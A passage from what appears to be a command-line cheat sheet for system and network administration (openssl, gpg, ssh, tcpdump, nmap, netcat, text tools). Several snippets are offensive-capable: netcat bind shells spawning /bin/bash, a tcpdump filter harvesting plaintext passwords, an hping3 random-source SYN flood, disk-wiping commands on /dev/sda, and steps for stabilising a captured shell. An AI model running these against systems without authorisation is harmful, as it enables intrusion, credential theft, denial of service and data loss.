Generate self-signed certificate from existing private key ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_out="domain.crt" ; _days="365" ; \ openssl req -key ${_fd} -nodes \ -x509 -days ${_days} -out ${_fd_out} ) ``` ###### Generate self-signed certificate from existing private key and csr ```bash # _len: 2048, 4096 ( _fd="domain.key" ; _fd_csr="domain.csr" ; _fd_out="domain.crt" ; _days="365" ; \ openssl x509 -signkey ${_fd} -nodes \ -in ${_fd_csr} -req -days ${_days} -out ${_fd_out} ) ``` ###### Generate DH public parameters ```bash ( _dh_size="2048" ; \ openssl dhparam -out /etc/nginx/ssl/dhparam_${_dh_size}.pem "$_dh_size" ) ``` ###### Display DH public parameters ```bash openssl pkeyparam -in dhparam.pem -text ``` ###### Extract private key from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_key="key.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nocerts -nodes -out ${_fd_key} ) ``` ###### Extract private key and certs from pfx ```bash ( _fd_pfx="cert.pfx" ; _fd_pem="key_certs.pem" ; \ openssl pkcs12 -in ${_fd_pfx} -nodes -out ${_fd_pem} ) ``` ###### Extract certs from p7b ```bash # PKCS#7 file doesn't include private keys. ( _fd_p7b="cert.p7b" ; _fd_pem="cert.pem" ; \ openssl pkcs7 -inform DER -outform PEM -in ${_fd_p7b} -print_certs > ${_fd_pem}) # or: openssl pkcs7 -print_certs -in -in ${_fd_p7b} -out ${_fd_pem}) ``` ###### Convert DER to PEM ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_der} -inform der -outform pem -out ${_fd_pem} ) ``` ###### Convert PEM to DER ```bash ( _fd_der="cert.crt" ; _fd_pem="cert.pem" ; \ openssl x509 -in ${_fd_pem} -outform der -out ${_fd_der} ) ``` ###### Verification of the private key ```bash ( _fd="private.key" ; \ openssl rsa -noout -text -in ${_fd} ) ``` ###### Verification of the public key ```bash # 1) ( _fd="public.key" ; \ openssl pkey -noout -text -pubin -in ${_fd} ) # 2) ( _fd="private.key" ; \ openssl rsa -inform PEM -noout -in ${_fd} &> /dev/null ; \ if [ $? = 0 ] ; then echo -en "OK\n" ; fi ) ``` ###### Verification of the certificate ```bash ( _fd="certificate.crt" ; # format: pem, cer, crt \ openssl x509 -noout -text -in ${_fd} ) ``` ###### Verification of the CSR ```bash ( _fd_csr="request.csr" ; \ openssl req -text -noout -in ${_fd_csr} ) ``` ###### Check the private key and the certificate are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl x509 -noout -modulus -in certificate.crt | openssl md5) | uniq ``` ###### Check the private key and the CSR are match ```bash (openssl rsa -noout -modulus -in private.key | openssl md5 ; \ openssl req -noout -modulus -in request.csr | openssl md5) | uniq ``` ___ ##### Tool: 🌎 [secure-delete](wiki.archlinux.org/index.php/Securely_wipe_disk) ###### Secure delete with shred ```bash shred -vfuz -n 10 file shred --verbose --random-source=/dev/urandom -n 1 /dev/sda ``` ###### Secure delete with scrub ```bash scrub -p dod /dev/sda scrub -p dod -r file ``` ###### Secure delete with badblocks ```bash badblocks -s -w -t random -v /dev/sda badblocks -c 10240 -s -w -t random -v /dev/sda ``` ###### Secure delete with secure-delete ```bash srm -vz /tmp/file sfill -vz /local sdmem -v swapoff /dev/sda5 && sswap -vz /dev/sda5 ``` ___ ##### Tool: [dd](https://en.wikipedia.org/wiki/Dd_(Unix)) ###### Show dd status every so often ```bash dd <dd_params> status=progress watch --interval 5 killall -USR1 dd ``` ###### Redirect output to a file with dd ```bash echo "string" | dd of=filename ``` ___ ##### Tool: 🌎 [gpg](www.gnupg.org/) ###### Export public key ```bash gpg --export --armor "<username>" > username.pkey ``` * `--export` - export all keys from all keyrings or specific key * `-a|--armor` - create ASCII armored output ###### Encrypt file ```bash gpg -e -r "<username>" dump.sql ``` * `-e|--encrypt` - encrypt data * `-r|--recipient` - encrypt for specific <username> ###### Decrypt file ```bash gpg -o dump.sql -d dump.sql.gpg ``` * `-o|--output` - use as output file * `-d|--decrypt` - decrypt data (default) ###### Search recipient ```bash gpg --keyserver hkp://keyserver.ubuntu.com --search-keys "<username>" ``` * `--keyserver` - set specific key server * `--search-keys` - search for keys on a key server ###### List all of the packets in an encrypted file ```bash gpg --batch --list-packets archive.gpg gpg2 --batch --list-packets archive.gpg ``` ___ ##### Tool: <b><code>104454⭐</code></b> <b><code>&nbsp;&nbsp;7528🍴</code></b> [system-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-system-other)) ###### Reboot system from init ```bash exec /sbin/init 6 ``` ###### Init system from single user mode ```bash exec /sbin/init ``` ###### Show current working directory of a process ```bash readlink -f /proc/<PID>/cwd ``` ###### Show actual pathname of the executed command ```bash readlink -f /proc/<PID>/exe ``` ##### Tool: 🌎 [curl](curl.haxx.se) ```bash curl -Iks https://www.google.com ``` * `-I` - show response headers only * `-k` - insecure connection when using ssl * `-s` - silent mode (not display body) ```bash curl -Iks --location -X GET -A "x-agent" https://www.google.com ``` * `--location` - follow redirects * `-X` - set method * `-A` - set user-agent ```bash curl -Iks --location -X GET -A "x-agent" --proxy http://127.0.0.1:16379 https://www.google.com ``` * `--proxy [socks5://|http://]` - set proxy server ```bash curl -o file.pdf -C - https://example.com/Aiju2goo0Ja2.pdf ``` * `-o` - write output to file * `-C` - resume the transfer ###### Find your external IP address (external services) ```bash curl ipinfo.io curl ipinfo.io/ip curl icanhazip.com curl ifconfig.me/ip ; echo ``` ###### Repeat URL request ```bash # URL sequence substitution with a dummy query string: curl -ks https://example.com/?[1-20] # With shell 'for' loop: for i in {1..20} ; do curl -ks https://example.com/ ; done ``` ###### Check DNS and HTTP trace with headers for specific domains ```bash ### Set domains and external dns servers. _domain_list=(google.com) ; _dns_list=("8.8.8.8" "1.1.1.1") for _domain in "${_domain_list[@]}" ; do printf '=%.0s' {1..48} echo printf "[\\e[1;32m+\\e[m] resolve: %s\\n" "$_domain" for _dns in "${_dns_list[@]}" ; do # Resolve domain. host "${_domain}" "${_dns}" echo done for _proto in http https ; do printf "[\\e[1;32m+\\e[m] trace + headers: %s://%s\\n" "$_proto" "$_domain" # Get trace and http headers. curl -Iks -A "x-agent" --location "${_proto}://${_domain}" echo done done unset _domain_list _dns_list ``` ___ ##### Tool: 🌎 [httpie](httpie.org/) ```bash http -p Hh https://www.google.com ``` * `-p` - print request and response headers * `H` - request headers * `B` - request body * `h` - response headers * `b` - response body ```bash http -p Hh https://www.google.com --follow --verify no ``` * `-F, --follow` - follow redirects * `--verify no` - skip SSL verification ```bash http -p Hh https://www.google.com --follow --verify no \ --proxy http:http://127.0.0.1:16379 ``` * `--proxy [http:]` - set proxy server ##### Tool: 🌎 [ssh](www.openssh.com/) ###### Escape Sequence ``` # Supported escape sequences: ~. - terminate connection (and any multiplexed sessions) ~B - send a BREAK to the remote system ~C - open a command line ~R - Request rekey (SSH protocol 2 only) ~^Z - suspend ssh ~# - list forwarded connections ~& - background ssh (when waiting for connections to terminate) ~? - this message ~~ - send the escape character by typing it twice ``` ###### Compare a remote file with a local file ```bash ssh user@host cat /path/to/remotefile | diff /path/to/localfile - ``` ###### SSH connection through host in the middle ```bash ssh -t reachable_host ssh unreachable_host ``` ###### Run command over SSH on remote host ```bash cat > cmd.txt << __EOF__ cat /etc/hosts __EOF__ ssh host -l user $(<cmd.txt) ``` ###### Get public key from private key ```bash ssh-keygen -y -f ~/.ssh/id_rsa ``` ###### Get all fingerprints ```bash ssh-keygen -l -f .ssh/known_hosts ``` ###### SSH authentication with user password ```bash ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no user@remote_host ``` ###### SSH authentication with publickey ```bash ssh -o PreferredAuthentications=publickey -o PubkeyAuthentication=yes -i id_rsa user@remote_host ``` ###### Simple recording SSH session ```bash function _ssh_sesslog() { _sesdir="<path/to/session/logs>" mkdir -p "${_sesdir}" && \ ssh $@ 2>&1 | tee -a "${_sesdir}/$(date +%Y%m%d).log" } # Alias: alias ssh='_ssh_sesslog' ``` ###### Using Keychain for SSH logins ```bash ### Delete all of ssh-agent's keys. function _scl() { /usr/bin/keychain --clear } ### Add key to keychain. function _scg() { /usr/bin/keychain /path/to/private-key source "$HOME/.keychain/$HOSTNAME-sh" } ``` ###### SSH login without processing any login scripts ```bash ssh -tt user@host bash ``` ###### SSH local port forwarding Example 1: ```bash # Forwarding our local 2250 port to nmap.org:443 from localhost through localhost host1> ssh -L 2250:nmap.org:443 localhost # Connect to the service: host1> curl -Iks --location -X GET https://localhost:2250 ``` Example 2: ```bash # Forwarding our local 9051 port to db.d.x:5432 from localhost through node.d.y host1> ssh -nNT -L 9051:db.d.x:5432 node.d.y # Connect to the service: host1> psql -U db_user -d db_dev -p 9051 -h localhost ``` * `-n` - redirects stdin from `/dev/null` * `-N` - do not execute a remote command * `-T` - disable pseudo-terminal allocation ###### SSH remote port forwarding ```bash # Forwarding our local 9051 port to db.d.x:5432 from host2 through node.d.y host1> ssh -nNT -R 9051:db.d.x:5432 node.d.y # Connect to the service: host2> psql -U postgres -d postgres -p 8000 -h localhost ``` ___ ##### Tool: 🌎 [linux-dev](www.tldp.org/LDP/abs/html/devref1.html) ###### Testing remote connection to port ```bash timeout 1 bash -c "</dev/<proto>/<host>/<port>" >/dev/null 2>&1 ; echo $? ``` * `<proto` - set protocol (tcp/udp) * `<host>` - set remote host * `<port>` - set destination port ###### Read and write to TCP or UDP sockets with common bash tools ```bash exec 5<>/dev/tcp/<host>/<port>; cat <&5 & cat >&5; exec 5>&- ``` ___ ##### Tool: [tcpdump](http://www.tcpdump.org/) ###### Filter incoming (on interface) traffic (specific <ip:port>) ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 ``` * `-n` - don't convert addresses (`-nn` will not resolve hostnames or ports) * `-e` - print the link-level headers * `-i [iface|any]` - set interface * `-Q|-D [in|out|inout]` - choose send/receive direction (`-D` - for old tcpdump versions) * `host [ip|hostname]` - set host, also `[host not]` * `[and|or]` - set logic * `port [1-65535]` - set port number, also `[port not]` ###### Filter incoming (on interface) traffic (specific <ip:port>) and write to a file ```bash tcpdump -ne -i eth0 -Q in host 192.168.252.1 and port 443 -c 5 -w tcpdump.pcap ``` * `-c [num]` - capture only num number of packets * `-w [filename]` - write packets to file, `-r [filename]` - reading from file ###### Capture all ICMP packets ```bash tcpdump -nei eth0 icmp ``` ###### Check protocol used (TCP or UDP) for service ```bash tcpdump -nei eth0 tcp port 22 -vv -X | egrep "TCP|UDP" ``` ###### Display ASCII text (to parse the output using grep or other) ```bash tcpdump -i eth0 -A -s0 port 443 ``` ###### Grab everything between two keywords ```bash tcpdump -i eth0 port 80 -X | sed -n -e '/username/,/=ldap/ p' ``` ###### Grab user and pass ever plain http ```bash tcpdump -i eth0 port http -l -A | egrep -i \ 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' \ --color=auto --line-buffered -B20 ``` ###### Extract HTTP User Agent from HTTP request header ```bash tcpdump -ei eth0 -nn -A -s1500 -l | grep "User-Agent:" ``` ###### Capture only HTTP GET and POST packets ```bash tcpdump -ei eth0 -s 0 -A -vv \ 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420' or 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354' ``` or simply: ```bash tcpdump -ei eth0 -s 0 -v -n -l | egrep -i "POST /|GET /|Host:" ``` ###### Rotate capture files ```bash tcpdump -ei eth0 -w /tmp/capture-%H.pcap -G 3600 -C 200 ``` * `-G <num>` - pcap will be created every `<num>` seconds * `-C <size>` - close the current pcap and open a new one if is larger than `<size>` ###### Top hosts by packets ```bash tcpdump -ei enp0s25 -nnn -t -c 200 | cut -f 1,2,3,4 -d '.' | sort | uniq -c | sort -nr | head -n 20 ``` ###### Excludes any RFC 1918 private address ```bash tcpdump -nei eth0 'not (src net (10 or 172.16/12 or 192.168/16) and dst net (10 or 172.16/12 or 192.168/16))' ``` ___ ##### Tool: [tcpick](http://tcpick.sourceforge.net/) ###### Analyse packets in real-time ```bash while true ; do tcpick -a -C -r dump.pcap ; sleep 2 ; clear ; done ``` ___ ##### Tool: [ngrep](http://ngrep.sourceforge.net/usage.html) ```bash ngrep -d eth0 "www.domain.com" port 443 ``` * `-d [iface|any]` - set interface * `[domain]` - set hostname * `port [1-65535]` - set port number ```bash ngrep -d eth0 "www.domain.com" src host 10.240.20.2 and port 443 ``` * `(host [ip|hostname])` - filter by ip or hostname * `(port [1-65535])` - filter by port number ```bash ngrep -d eth0 -qt -O ngrep.pcap "www.domain.com" port 443 ``` * `-q` - quiet mode (only payloads) * `-t` - added timestamps * `-O [filename]` - save output to file, `-I [filename]` - reading from file ```bash ngrep -d eth0 -qt 'HTTP' 'tcp' ``` * `HTTP` - show http headers * `tcp|udp` - set protocol * `[src|dst] host [ip|hostname]` - set direction for specific node ```bash ngrep -l -q -d eth0 -i "User-Agent: curl*" ``` * `-l` - stdout line buffered * `-i` - case-insensitive search ___ ##### Tool: [hping3](http://www.hping.org/) ```bash hping3 -V -p 80 -s 5050 <scan_type> www.google.com ``` * `-V|--verbose` - verbose mode * `-p|--destport` - set destination port * `-s|--baseport` - set source port * `<scan_type>` - set scan type * `-F|--fin` - set FIN flag, port open if no reply * `-S|--syn` - set SYN flag * `-P|--push` - set PUSH flag * `-A|--ack` - set ACK flag (use when ping is blocked, RST response back if the port is open) * `-U|--urg` - set URG flag * `-Y|--ymas` - set Y unused flag (0x80 - nullscan), port open if no reply * `-M 0 -UPF` - set TCP sequence number and scan type (URG+PUSH+FIN), port open if no reply ```bash hping3 -V -c 1 -1 -C 8 www.google.com ``` * `-c [num]` - packet count * `-1` - set ICMP mode * `-C|--icmptype [icmp-num]` - set icmp type (default icmp-echo = 8) ```bash hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 --flood --rand-source <remote_host> ``` * `--flood` - sent packets as fast as possible (don't show replies) * `--rand-source` - random source address mode * `-d --data` - data size * `-w|--win` - winsize (default 64) ___ ##### Tool: 🌎 [nmap](nmap.org/) ###### Ping scans the network ```bash nmap -sP 192.168.0.0/24 ``` ###### Show only open ports ```bash nmap -F --open 192.168.0.0/24 ``` ###### Full TCP port scan using with service version detection ```bash nmap -p 1-65535 -sV -sS -T4 192.168.0.0/24 ``` ###### Nmap scan and pass output to Nikto ```bash nmap -p80,443 192.168.0.0/24 -oG - | nikto.pl -h - ``` ###### Recon specific ip:service with Nmap NSE scripts stack ```bash # Set variables: _hosts="192.168.250.10" _ports="80,443" # Set Nmap NSE scripts stack: _nmap_nse_scripts="+dns-brute,\ +http-auth-finder,\ +http-chrono,\ +http-cookie-flags,\ +http-cors,\ +http-cross-domain-policy,\ +http-csrf,\ +http-dombased-xss,\ +http-enum,\ +http-errors,\ +http-git,\ +http-grep,\ +http-internal-ip-disclosure,\ +http-jsonp-detection,\ +http-malware-host,\ +http-methods,\ +http-passwd,\ +http-phpself-xss,\ +http-php-version,\ +http-robots.txt,\ +http-sitemap-generator,\ +http-shellshock,\ +http-stored-xss,\ +http-title,\ +http-unsafe-output-escaping,\ +http-useragent-tester,\ +http-vhosts,\ +http-waf-detect,\ +http-waf-fingerprint,\ +http-xssed,\ +traceroute-geolocation.nse,\ +ssl-enum-ciphers,\ +whois-domain,\ +whois-ip" # Set Nmap NSE script params: _nmap_nse_scripts_args="dns-brute.domain=${_hosts},http-cross-domain-policy.domain-lookup=true," _nmap_nse_scripts_args+="http-waf-detect.aggro,http-waf-detect.detectBodyChanges," _nmap_nse_scripts_args+="http-waf-fingerprint.intensive=1" # Perform scan: nmap --script="$_nmap_nse_scripts" --script-args="$_nmap_nse_scripts_args" -p "$_ports" "$_hosts" ``` ___ ##### Tool: [netcat](http://netcat.sourceforge.net/) ```bash nc -kl 5000 ``` * `-l` - listen for an incoming connection * `-k` - listening after client has disconnected * `>filename.out` - save receive data to file (optional) ```bash nc 192.168.0.1 5051 < filename.in ``` * `< filename.in` - send data to remote host ```bash nc -vz 10.240.30.3 5000 ``` * `-v` - verbose output * `-z` - scan for listening daemons ```bash nc -vzu 10.240.30.3 1-65535 ``` * `-u` - scan only udp ports ###### Transfer data file (archive) ```bash server> nc -l 5000 | tar xzvfp - client> tar czvfp - /path/to/dir | nc 10.240.30.3 5000 ``` ###### Launch remote shell ```bash # 1) server> nc -l 5000 -e /bin/bash client> nc 10.240.30.3 5000 # 2) server> rm -f /tmp/f; mkfifo /tmp/f server> cat /tmp/f | /bin/bash -i 2>&1 | nc -l 127.0.0.1 5000 > /tmp/f client> nc 10.240.30.3 5000 ``` ###### Simple file server ```bash while true ; do nc -l 5000 | tar -xvf - ; done ``` ###### Simple minimal HTTP Server ```bash while true ; do nc -l -p 1500 -c 'echo -e "HTTP/1.1 200 OK\n\n $(date)"' ; done ``` ###### Simple HTTP Server > Restarts web server after each request - remove `while` condition for only single connection. ```bash cat > index.html << __EOF__ <!doctype html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <title></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <p> Hello! It's a site. </p> </body> </html> __EOF__ ``` ```bash server> while : ; do \ (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n" ; cat index.html;) | \ nc -l -p 5000 \ ; done ``` * `-p` - port number ###### Simple HTTP Proxy (single connection) ```bash #!/usr/bin/env bash if [[ $# != 2 ]] ; then printf "%s\\n" \ "usage: ./nc-proxy listen-port bk_host:bk_port" fi _listen_port="$1" _bk_host=$(echo "$2" | cut -d ":" -f1) _bk_port=$(echo "$2" | cut -d ":" -f2) printf " lport: %s\\nbk_host: %s\\nbk_port: %s\\n\\n" \ "$_listen_port" "$_bk_host" "$_bk_port" _tmp=$(mktemp -d) _back="$_tmp/pipe.back" _sent="$_tmp/pipe.sent" _recv="$_tmp/pipe.recv" trap 'rm -rf "$_tmp"' EXIT mkfifo -m 0600 "$_back" "$_sent" "$_recv" sed "s/^/=> /" <"$_sent" & sed "s/^/<= /" <"$_recv" & nc -l -p "$_listen_port" <"$_back" | \ tee "$_sent" | \ nc "$_bk_host" "$_bk_port" | \ tee "$_recv" >"$_back" ``` ```bash server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000 lport: 8080 bk_host: 192.168.252.10 bk_port: 8000 client> http -p h 10.240.30.3:8080 HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=31536000 Content-Length: 2748 Content-Type: text/html; charset=utf-8 Date: Sun, 01 Jul 2018 20:12:08 GMT Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT ``` ###### Create a single-use TCP or UDP proxy ```bash ### TCP -> TCP nc -l -p 2000 -c "nc [ip|hostname] 3000" ### TCP -> UDP nc -l -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> UDP nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000" ### UDP -> TCP nc -l -u -p 2000 -c "nc [ip|hostname] 3000" ``` ___ ##### Tool: 🌎 [gnutls-cli](gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html) ###### Testing connection to remote host (with SNI support) ```bash gnutls-cli -p 443 google.com ``` ###### Testing connection to remote host (without SNI support) ```bash gnutls-cli --disable-sni -p 443 google.com ``` ___ ##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html) ###### Testing remote connection to port ```bash socat - TCP4:10.240.30.3:22 ``` * `-` - standard input (STDIO) * `TCP4:<params>` - set tcp4 connection with specific params * `[hostname|ip]` - set hostname/ip * `[1-65535]` - set port number ###### Redirecting TCP-traffic to a UNIX domain socket under Linux ```bash socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo ``` * `TCP-LISTEN:<params>` - set tcp listen with specific params * `[1-65535]` - set port number * `bind=[hostname|ip]` - set bind hostname/ip * `reuseaddr` - allows other sockets to bind to an address * `fork` - keeps the parent process attempting to produce more connections * `su=nobody` - set user * `range=[ip-range]` - ip range * `UNIX-CLIENT:<params>` - communicates with the specified peer socket * `filename` - define socket ___ ##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/) ###### Set iface in promiscuous mode and dump traffic to the log file ```bash p0f -i enp0s25 -p -d -o /dump/enp0s25.log ``` * `-i` - listen on the specified interface * `-p` - set interface in promiscuous mode * `-d` - fork into background * `-o` - output file ___ ##### Tool: 🌎 [netstat](en.wikipedia.org/wiki/Netstat) ###### Graph # of connections for each hosts ```bash netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \ sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }' ``` ###### Monitor open connections for specific port including listen, count and sort it per IP ```bash watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1" ``` ###### Grab banners from local IPv4 listening ports ```bash netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}" ``` ___ ##### Tool: 🌎 [rsync](en.wikipedia.org/wiki/Rsync) ###### Rsync remote data as root using sudo ```bash rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/ ``` ___ ##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix)) ###### Resolves the domain name (using external dns server) ```bash host google.com 9.9.9.9 ``` ###### Checks the domain administrator (SOA record) ```bash host -t soa google.com 9.9.9.9 ``` ___ ##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command)) ###### Resolves the domain name (short output) ```bash dig google.com +short ``` ###### Lookup NS record for specific domain ```bash dig @9.9.9.9 google.com NS ``` ###### Query only answer section ```bash dig google.com +nocomments +noquestion +noauthority +noadditional +nostats ``` ###### Query ALL DNS Records ```bash dig google.com ANY +noall +answer ``` ###### DNS Reverse Look-up ```bash dig -x 172.217.16.14 +short ``` ___ ##### Tool: 🌎 [certbot](certbot.eff.org/) ###### Generate multidomain certificate ```bash certbot certonly -d example.com -d www.example.com ``` ###### Generate wildcard certificate ```bash certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com ``` ###### Generate certificate with 4096 bit private key ```bash certbot certonly -d example.com -d www.example.com --rsa-key-size 4096 ``` ___ ##### Tool: <b><code>104454⭐</code></b> <b><code>&nbsp;&nbsp;7528🍴</code></b> [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other)) ###### Get all subnets for specific AS (Autonomous system) ```bash AS="AS32934" whois -h whois.radb.net -- "-i origin ${AS}" | \ grep "^route:" | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]//' | \ sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \ cut -d ":" -f2 | \ sed -e 's/^[ \t]/allow /' | \ sed 's/$/;/' | \ sed 's/allow */subnet -> /g' ``` ###### Resolves domain name from dns.google.com with curl and jq ```bash _dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq . ``` ##### Tool: 🌎 [git](git-scm.com/) ###### Log alias for a decent view of your repo ```bash # 1) git log --oneline --decorate --graph --all # 2) git log --graph \ --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \ --abbrev-commit ``` ___ ##### Tool: 🌎 [python](www.python.org/) ###### Static HTTP web server ```bash # Python 3.x python3 -m http.server 8000 --bind 127.0.0.1 # Python 2.x python -m SimpleHTTPServer 8000 ``` ###### Static HTTP web server with SSL support ```bash # Python 3.x from http.server import HTTPServer, BaseHTTPRequestHandler import ssl httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/to/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() # Python 2.x import BaseHTTPServer, SimpleHTTPServer import ssl httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler) httpd.socket = ssl.wrap_socket (httpd.socket, keyfile="path/tp/key.pem", certfile='path/to/cert.pem', server_side=True) httpd.serve_forever() ``` ###### Encode base64 ```bash python -m base64 -e <<< "sample string" ``` ###### Decode base64 ```bash python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg==" ``` ##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html) ###### Search for matching lines ```bash # egrep foo awk '/foo/' filename ``` ###### Search non matching lines ```bash # egrep -v foo awk '!/foo/' filename ``` ###### Print matching lines with numbers ```bash # egrep -n foo awk '/foo/{print FNR,$0}' filename ``` ###### Print the last column ```bash awk '{print $NF}' filename ``` ###### Find all the lines longer than 80 characters ```bash awk 'length($0)>80{print FNR,$0}' filename ``` ###### Print only lines of less than 80 characters ```bash awk 'length < 80' filename ``` ###### Print double new lines a file ```bash awk '1; { print "" }' filename ``` ###### Print line numbers ```bash awk '{ print FNR "\t" $0 }' filename awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner ``` ###### Print line numbers for only non-blank lines ```bash awk 'NF { $0=++a " :" $0 }; { print }' filename ``` ###### Print the line and the next two (i=5) lines after the line matching regexp ```bash awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename ``` ###### Print the lines starting at the line matching 'server {' until the line matching '}' ```bash awk '/server {/,/}/' filename ``` ###### Print multiple columns with separators ```bash awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename ``` ###### Remove empty lines ```bash awk 'NF > 0' filename # alternative: awk NF filename ``` ###### Delete trailing white space (spaces, tabs) ```bash awk '{sub(/[ \t]*$/, "");print}' filename ``` ###### Delete leading white space ```bash awk '{sub(/^[ \t]+/, ""); print}' filename ``` ###### Remove duplicate consecutive lines ```bash # uniq awk 'a !~ $0{print}; {a=$0}' filename ``` ###### Remove duplicate entries in a file without sorting ```bash awk '!x[$0]++' filename ``` ###### Exclude multiple columns ```bash awk '{$1=$3=""}1' filename ``` ###### Substitute foo for bar on lines matching regexp ```bash awk '/regexp/{gsub(/foo/, "bar")};{print}' filename ``` ###### Add some characters at the beginning of matching lines ```bash awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename ``` ###### Get the last hour of Apache logs ```bash awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \ /var/log/httpd/access_log ``` ___ ##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html) ###### Print a specific line from a file ```bash sed -n 10p /path/to/file ``` ###### Remove a specific line from a file ```bash sed -i 10d /path/to/file # alternative (BSD): sed -i'' 10d /path/to/file ``` ###### Remove a range of lines from a file ```bash sed -i <file> -re '<start>,<end>d' ``` ###### Replace newline(s) with a space ```bash sed ':a;N;$!ba;s/\n/ /g' /path/to/file # cross-platform compatible syntax: sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file ``` - `:a` create a label `a` - `N` append the next line to the pattern space - `$!` if not the last line, ba branch (go to) label `a` - `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can) Alternatives: ```bash # perl version (sed-like speed): perl -p -e 's/\n/ /' /path/to/file # bash version (slow): while read line ; do printf "%s" "$line " ; done < file ``` ###### Delete string +N next lines ```bash sed '/start/,+4d' /path/to/file ``` ___ ##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html) ###### Search for a "pattern" inside all files in the current directory ```bash grep -rn "pattern" grep -RnisI "pattern" * fgrep "pattern" * -R ``` ###### Show only for multiple patterns ```bash grep 'INFO*'\''WARN' filename grep 'INFO\|WARN' filename grep -e INFO -e WARN filename grep -E '(INFO|WARN)' filename egrep "INFO|WARN" filename ``` ###### Except multiple patterns ```bash grep -vE '(error|critical|warning)' filename ``` ###### Show data from file without comments ```bash grep -v ^[[:space:]]*# filename ``` ###### Show data from file without comments and new lines ```bash egrep -v '#|^$' filename ``` ###### Show strings with a dash/hyphen ```bash grep -e -- filename grep -- -- filename grep "\-\-" filename ``` ###### Remove blank lines from a file and save output to new file ```bash grep . filename > newfilename ``` ##### Tool: 🌎 [perl](www.perl.org/) ###### Search and replace (in place) ```bash perl -i -pe's/SEARCH/REPLACE/' filename ``` ###### Edit of `*.conf` files changing all foo to bar (and backup original) ```bash perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf ``` ###### Prints the first 20 lines from `*.conf` files ```bash perl -pe 'exit if $. > 20' *.conf ``` ###### Search lines 10 to 20 ```bash perl -ne 'print if 10 .. 20' filename ``` ###### Delete first 10 lines (and backup original) ```bash perl -i.orig -ne 'print unless 1 .. 10' filename ``` ###### Delete all but lines between foo and bar (and backup original) ```bash perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename ``` ###### Reduce multiple blank lines to a single line ```bash perl -p -i -00pe0 filename ``` ###### Convert tabs to spaces (1t = 2sp) ```bash perl -p -i -e 's/\t/ /g' filename ``` ###### Read input from a file and report number of lines and characters ```bash perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename ``` #### Shell Tricks &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) When you get a shell, it is generally not very clean, but after following these steps, you will have a fairly clean and comfortable shell to work with. 1) `script /dev/null -c bash` 2) Ctrl-Z (to send it to background) 3) `stty raw -echo; fg` (returns the shell to foreground) 4) `reset` (to reset terminal) 5) `xterm` (when asked for terminal type) 6) `export TERM=xterm; export SHELL=bash` #### Shell functions &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### Table of Contents - [Domain resolve](#domain-resolve) - [Get ASN](#get-asn) ###### Domain resolve ```bash # 